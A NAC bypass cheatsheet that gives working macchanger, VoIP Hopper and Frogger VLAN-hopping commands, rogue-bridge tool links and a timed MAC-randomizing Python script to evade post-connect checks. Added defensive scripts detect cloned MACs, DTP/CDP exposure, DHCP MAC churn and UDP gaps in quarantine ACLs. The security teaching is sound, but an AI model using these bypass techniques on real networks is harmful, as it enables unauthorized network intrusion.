# NAC Bypass Cheatsheet

### Pre-connect Scenario

In a pre-connect scenario, the decision to grant access is made before the endpoint gets any access to network resources.

* **MAC Spoofing**\
  It is possible to spoof the MAC address of the following devices and obtain network access.

1. Physical devices like old VoIP phones, printers, cameras, etc. may not support 802.1X authentication, and the MAC addresses assigned to these devices can be spoofed to obtain an IP address.
2. Physical access to 802.1X-authenticated VoIP phones, printers, etc. may disclose MAC and IP information via the network settings menu, stickers on the back of the device, etc.
3. The boot menu of certain workstations, laptops, etc. may disclose the MAC address.

{% code title="macchanger" %}

```bash
macchanger -m XX:XX:XX:XX:XX:XX eth0   # the interface name is required; replace eth0 with your interface
```

{% endcode %}
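A defender-side counterpart to the MAC spoofing entries above: MAB-exempt phones and printers are the MACs most worth cloning, and a cloned MAC shows up in the switch's MAC table either on a port other than the one the device is provisioned on, or on two ports at once. The script below is an added example, not part of the original cheatsheet; the MAB inventory and the `show mac address-table` output are constructed to look like Cisco IOS output, and the port names are assumptions.

```python
"""Audit a switch MAC address table against the inventory of devices exempted
from 802.1X via MAC authentication bypass (MAB). Added example for the
cheatsheet; the inventory and the table output are constructed, not taken from
a real switch."""
import re
from collections import defaultdict

# Constructed inventory: MAB-exempt device MAC -> port it is provisioned on.
MAB_INVENTORY = {
    "0004.f2aa.0001": "Gi1/0/10",  # VoIP phone
    "0004.f2aa.0002": "Gi1/0/11",  # VoIP phone
    "00a0.d1bb.0100": "Gi1/0/20",  # printer
}

# Constructed 'show mac address-table' output in Cisco IOS layout.
MAC_TABLE = """\
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
  10    0004.f2aa.0001    DYNAMIC     Gi1/0/10
  10    0004.f2aa.0002    DYNAMIC     Gi1/0/11
  10    0004.f2aa.0002    DYNAMIC     Gi1/0/35
  20    00a0.d1bb.0100    DYNAMIC     Gi1/0/42
  20    3c5a.b4cc.0007    DYNAMIC     Gi1/0/15
"""

ROW = re.compile(
    r"^\s*(\d+)\s+([0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+\S+\s+(\S+)\s*$"
)


def parse_mac_table(text):
    """Return a mapping of MAC -> set of ports the MAC was learned on."""
    seen = defaultdict(set)
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            _vlan, mac, port = m.groups()
            seen[mac.lower()].add(port)
    return seen


def audit(table_text, inventory):
    """Return (mac, finding) pairs for MAB-exempt MACs that look cloned:
    learned on more than one port at once, or learned on a port other than
    the one the device is provisioned on."""
    findings = []
    seen = parse_mac_table(table_text)
    for mac, expected_port in inventory.items():
        ports = seen.get(mac, set())
        if len(ports) > 1:
            findings.append((mac, f"learned on several ports {sorted(ports)}, provisioned on {expected_port}"))
        elif ports and expected_port not in ports:
            findings.append((mac, f"moved from {expected_port} to {next(iter(ports))}"))
    return findings


if __name__ == "__main__":
    for mac, why in audit(MAC_TABLE, MAB_INVENTORY):
        print(f"{mac}: {why}")
```

Run it as-is and it reports the phone on `Gi1/0/11` as duplicated on `Gi1/0/35` and the printer as having moved; the same check can be wired to a periodic `show mac address-table` pull, and port security with sticky MACs on the provisioned ports stops the duplicate from being learned in the first place.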

* **VoIP Hopping via CDP packets**\
  The CDP protocol can be abused to hop the VLAN and obtain an IP address.

  The [**VoIP Hopper**](https://tools.kali.org/sniffingspoofing/voiphopper) tool can be used to execute this attack.

{% code title="VOIPhopper Example" %}

```bash
voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1
```

{% endcode %}

* **VLAN Hopping via DTP Packets**\
  It is possible to hop VLANs by abusing the DTP protocol.\
  \
  [***Frogger***](https://github.com/nccgroup/vlan-hopping) can be used to execute such attacks.

```bash
root@kali:/opt# git clone https://github.com/nccgroup/vlan-hopping
root@kali:/opt# cd vlan-hopping/
root@kali:/opt/vlan-hopping# ls
frogger.sh  LICENSE  README.md
root@kali:/opt/vlan-hopping# ./frogger.sh
```
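Both the CDP and the DTP entries above only work against ports that still negotiate. The script below is an added example, not part of the original cheatsheet or of the tools it lists: it walks a constructed Cisco IOS configuration excerpt and reports user ports that have no static mode, that lack `switchport nonegotiate`, or that still run CDP without a voice VLAN to advertise (phones legitimately need CDP, so that case is exempted). The interface names, descriptions and VLAN numbers are assumptions.

```python
"""Audit access-port configuration for the DTP and CDP exposure the DTP/CDP
hopping entries rely on. Added example for the cheatsheet; the running
configuration below is constructed and the checks are mine, not a vendor tool."""

# Constructed Cisco IOS configuration excerpt: a weak port, a hardened port,
# and a phone port that needs CDP for its voice VLAN.
SAMPLE_CONFIG = """\
interface GigabitEthernet1/0/1
 description user port, default settings
 switchport mode dynamic desirable
!
interface GigabitEthernet1/0/2
 description user port, hardened
 switchport mode access
 switchport access vlan 10
 switchport nonegotiate
 no cdp enable
!
interface GigabitEthernet1/0/3
 description phone port
 switchport mode access
 switchport access vlan 10
 switchport voice vlan 100
!
"""


def parse_interfaces(config):
    """Return {interface name: [config lines under it]}."""
    ifaces, current = {}, None
    for raw in config.splitlines():
        if raw.startswith("interface "):
            current = raw.split(None, 1)[1]
            ifaces[current] = []
        elif raw.startswith(" ") and current is not None:
            ifaces[current].append(raw.strip())
        else:
            current = None  # '!' or a top-level command ends the block
    return ifaces


def audit_port(cmds):
    """Findings for one interface. A port with no explicit mode is treated as
    negotiating, which is the default on most Catalyst switches (dynamic auto)."""
    findings = []
    mode = next((c.split()[2] for c in cmds if c.startswith("switchport mode ")), None)
    if mode in (None, "dynamic"):
        findings.append("DTP: port will negotiate a trunk (no static access/trunk mode)")
    if "switchport nonegotiate" not in cmds:
        findings.append("DTP: 'switchport nonegotiate' missing, DTP frames are still sent")
    has_voice = any(c.startswith("switchport voice vlan") for c in cmds)
    if "no cdp enable" not in cmds and not has_voice:
        findings.append("CDP: enabled on a port that has no voice VLAN to advertise")
    return findings


def audit_config(config):
    """Return {interface: findings} for interfaces with at least one finding."""
    result = {}
    for name, cmds in parse_interfaces(config).items():
        found = audit_port(cmds)
        if found:
            result[name] = found
    return result


if __name__ == "__main__":
    for name, found in audit_config(SAMPLE_CONFIG).items():
        print(name)
        for f in found:
            print("  -", f)
```

On the sample, `GigabitEthernet1/0/1` collects all three findings, the hardened port collects none, and the phone port is flagged only for the missing `switchport nonegotiate`.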

* **Pre-authenticated device**\
  Pre-authenticated devices can be used to bypass NAC solutions. In this situation an attacker places a rogue device such as a Raspberry Pi between the supplicant and the authentication server; the supplicant's traffic then flows through the rogue device.

![https://twitter.com/dafthack/status/610468589569638400?lang=en](/files/-LoSSWfw4_3FDV_Jt4ot)

| Name         | Link                                                |
| ------------ | --------------------------------------------------- |
| Nackered     | <https://github.com/p292/NACKered>                  |
| Fenrir       | <https://github.com/Orange-Cyberdefense/fenrir-ocd> |
| Silentbridge | <https://github.com/s0lst1c3/silentbridge>          |
| BITM         | <https://gitlab.com/warpnet/BitM>                   |

* **Physical access to the network switch**\
  Obtaining physical access to the network switch and changing its configuration is one of the toughest but most foolproof ways of bypassing NAC solutions 🤢.
* **Probe Request**\
  Fire up [***Wireshark***](https://www.wireshark.org/) and check for MAC addresses in probe requests. Try spoofing a MAC gathered from a probe request.

### Post-Connect Scenario

In a post-connect scenario you are allowed onto the network for a short period of time while a set of checks is run against your endpoint. If the endpoint fails to meet the requirements, it is blocked from using any further resources.

* **MAC randomization**\
  As mentioned before, in a post-connect scenario it is possible to use network resources for a short period of time while the requirement check is done. In this situation an attacker can change their MAC address to obtain a new IP address before getting blocked, and continue using the network resources.\
  \
  Below is a small Python script which I made to automate this.

{% code title="randommac.py" %}

```python
#!/usr/bin/env python3
import subprocess
import sys
import threading
import time

IFACE = "eth0"   # change interface if required
INTERVAL = 50    # MAC address will change every 50 seconds


class MacChanger(threading.Thread):
    """Background thread that re-randomizes the interface MAC on a timer."""

    def __init__(self, name):
        threading.Thread.__init__(self, name=name)
        self.die = False

    def run(self):
        while not self.die:
            print("changing MAC address\n\n" + time.ctime())
            subprocess.call(["sudo", "ifconfig", IFACE, "down"])
            subprocess.call(["sudo", "macchanger", "-A", IFACE])  # -A: random vendor MAC of any kind
            subprocess.call(["sudo", "ifconfig", IFACE, "up"])
            print("MAC changed\n")
            time.sleep(INTERVAL)

    def stop(self):
        self.die = True


if __name__ == '__main__':
    f = MacChanger('first')
    f.daemon = True  # let Ctrl-C end the process without waiting out the sleep
    f.start()
    try:
        while True:
            time.sleep(2)
    except KeyboardInterrupt:
        f.stop()
        print("bye")
        sys.exit(1)
```

{% endcode %}

![Random mac ](/files/-LoXJxsfQQAra1asXwff)
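From the network side, the script above leaves a distinctive trace: the same endpoint keeps taking fresh DHCP leases under new MAC addresses while the DHCP client still sends the same host name. The following detection is an added example, not part of the original cheatsheet; the log lines are constructed in ISC dhcpd's `DHCPACK` syslog format, and the five-minute window, the threshold of three MACs and the host names are my own assumptions.

```python
"""Flag endpoints that keep re-requesting DHCP leases with new MAC addresses,
the pattern the post-connect MAC randomization trick leaves behind. Added
example for the cheatsheet; the syslog lines are constructed in ISC dhcpd's
DHCPACK format and the threshold and window are my own choices."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed dhcpd log: ws-lab07 rotates through four MACs in under four
# minutes, the printer renews normally, and ws-lab07 shows up once more later.
SAMPLE_LOG = """\
Mar  3 10:00:01 dhcp1 dhcpd: DHCPACK on 192.168.112.50 to 00:11:22:33:44:55 (ws-lab07) via eth1
Mar  3 10:00:52 dhcp1 dhcpd: DHCPACK on 192.168.112.51 to 0a:1b:2c:3d:4e:5f (ws-lab07) via eth1
Mar  3 10:01:43 dhcp1 dhcpd: DHCPACK on 192.168.112.52 to 66:77:88:99:aa:bb (ws-lab07) via eth1
Mar  3 10:02:34 dhcp1 dhcpd: DHCPACK on 192.168.112.53 to de:ad:be:ef:00:01 (ws-lab07) via eth1
Mar  3 10:05:00 dhcp1 dhcpd: DHCPACK on 192.168.112.80 to 00:aa:bb:cc:dd:ee (printer-2f) via eth1
Mar  3 11:30:00 dhcp1 dhcpd: DHCPACK on 192.168.112.50 to 00:11:22:33:44:55 (ws-lab07) via eth1
"""

ACK = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dhcpd: DHCPACK on (\S+) to "
    r"([0-9a-fA-F:]{17}) \(([^)]+)\) via \S+"
)


def parse_dhcp_log(text, year=2024):
    """Return a list of (timestamp, ip, mac, hostname) from DHCPACK lines.
    syslog timestamps carry no year, so one is supplied (assumption)."""
    events = []
    for line in text.splitlines():
        m = ACK.match(line)
        if not m:
            continue
        stamp = " ".join(m.group(1).split())  # collapse 'Mar  3' to 'Mar 3'
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        events.append((ts, m.group(2), m.group(3).lower(), m.group(4)))
    return events


def detect_mac_churn(events, window_s=300, threshold=3):
    """Return one alert per hostname that used >= threshold distinct MACs
    inside any window_s-second window: (hostname, window start, macs).
    The hostname is the pivot because macchanger changes the MAC while the
    DHCP client keeps sending the same host name."""
    recent = defaultdict(deque)  # hostname -> (ts, mac) pairs inside the window
    alerts, alerted = [], set()
    for ts, _ip, mac, host in sorted(events):
        q = recent[host]
        q.append((ts, mac))
        while (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()
        macs = {m for _, m in q}
        if len(macs) >= threshold and host not in alerted:
            alerts.append((host, q[0][0], sorted(macs)))
            alerted.add(host)
    return alerts


if __name__ == "__main__":
    for host, start, macs in detect_mac_churn(parse_dhcp_log(SAMPLE_LOG)):
        print(f"{start:%H:%M:%S} {host}: {len(macs)} MACs in 5 min: {', '.join(macs)}")
```

The sample produces a single alert for `ws-lab07` starting at 10:00:01; the printer's normal renewal and the later, isolated `ws-lab07` lease stay quiet. A client that also randomizes its host name would defeat this pivot, which is why DHCP option 61 client identifiers and DHCP fingerprints make better keys where the server logs them.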

* **UDP Filtering**\
  Sometimes NAC solutions will only block TCP connections while UDP connections are still allowed; an attacker can leverage this to conduct a NetBIOS scan in order to obtain IP and MAC addresses.

{% code title="NBTSCAN" %}

```bash
root@kali:~/Desktop# nbtscan 192.168.112.xx
Doing NBT name scan for addresses from 192.168.112.xx

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.112.xx    xxx              xx        xx            00:00:00:xx:xx:xx
```

{% endcode %}
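The UDP gap above usually comes from a quarantine ACL written with only TCP in mind. The script below is an added example, not part of the original cheatsheet: it evaluates a handful of probe packets from a quarantined host through two constructed Cisco IOS extended ACLs, one that denies TCP and then permits everything else, and the corrected one that ends with an explicit `deny ip any any`. The evaluator covers only the subset of ACL syntax used here (`any`/`host` addresses, optional `eq` ports, first match wins, implicit deny at the end); the ACL names, subnets and the remediation portal address are assumptions.

```python
"""Check that a NAC quarantine ACL also blocks UDP, the gap the NetBIOS scan
above exploits. Added example for the cheatsheet; the two ACLs are constructed
in Cisco IOS extended-ACL syntax and the evaluator handles only the subset of
that syntax used here (any/host addresses, optional 'eq' ports)."""

# Constructed: a quarantine ACL that only thinks about TCP ...
WEAK_ACL = """\
ip access-list extended QUARANTINE-WEAK
 permit udp any any eq 53
 permit udp any eq 68 any eq 67
 permit tcp any host 10.10.10.5 eq 443
 deny   tcp any any
 permit ip any any
"""

# ... and the corrected one, which ends with an explicit deny for everything.
FIXED_ACL = """\
ip access-list extended QUARANTINE-FIXED
 permit udp any any eq 53
 permit udp any eq 68 any eq 67
 permit tcp any host 10.10.10.5 eq 443
 deny   ip any any
"""


def _addr(tok, i):
    """Parse 'any' or 'host A.B.C.D' starting at tok[i]; return (addr, next i)."""
    if tok[i] == "any":
        return "any", i + 1
    if tok[i] == "host":
        return tok[i + 1], i + 2
    raise ValueError(f"unsupported address spec: {' '.join(tok)}")


def parse_acl(text):
    """Return the ACEs as dicts in order; non-ACE lines are ignored."""
    aces = []
    for raw in text.splitlines():
        tok = raw.split()
        if len(tok) < 4 or tok[0] not in ("permit", "deny"):
            continue
        src, i = _addr(tok, 2)
        sport = None
        if i < len(tok) and tok[i] == "eq":
            sport, i = int(tok[i + 1]), i + 2
        dst, i = _addr(tok, i)
        dport = int(tok[i + 1]) if i < len(tok) and tok[i] == "eq" else None
        aces.append({"action": tok[0], "proto": tok[1], "src": src,
                     "sport": sport, "dst": dst, "dport": dport})
    return aces


def evaluate(aces, proto, src, dst, sport=None, dport=None):
    """First-match evaluation with the implicit deny at the end."""
    for a in aces:
        if a["proto"] not in ("ip", proto):
            continue
        if a["src"] not in ("any", src) or a["dst"] not in ("any", dst):
            continue
        if a["sport"] is not None and a["sport"] != sport:
            continue
        if a["dport"] is not None and a["dport"] != dport:
            continue
        return a["action"]
    return "deny"


# Constructed probes from a quarantined host (10.20.0.7) to a peer and to infrastructure.
PROBES = {
    "smb-peer":  ("tcp", "10.20.0.7", "10.20.0.9", 445),
    "nbns-peer": ("udp", "10.20.0.7", "10.20.0.9", 137),  # what nbtscan sends
    "dns":       ("udp", "10.20.0.7", "10.20.0.1", 53),
    "portal":    ("tcp", "10.20.0.7", "10.10.10.5", 443),
}


def check_quarantine(acl_text):
    """Return {probe name: 'permit' | 'deny'} for each probe through the ACL."""
    aces = parse_acl(acl_text)
    return {name: evaluate(aces, p, s, d, dport=dp) for name, (p, s, d, dp) in PROBES.items()}


if __name__ == "__main__":
    for label, acl in (("weak", WEAK_ACL), ("fixed", FIXED_ACL)):
        print(label, check_quarantine(acl))
```

The weak ACL denies SMB but permits the NetBIOS name query to a peer host, which is exactly the traffic `nbtscan` relies on; the fixed ACL keeps DNS, DHCP and the remediation portal reachable and denies everything else, UDP and ICMP included.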

* **Captive Portal Bypass**\
  [***Here***](https://blog.0katz.ca/bypassing_nac.html) is a great post on bypassing captive portals. Kudos to [***0KATZ***](https://blog.0katz.ca/bypassing_nac.html) for this blog post.

#### **Something missing here? Reach me** [***@noob\_pikachu***](https://twitter.com/noob_pikachu)


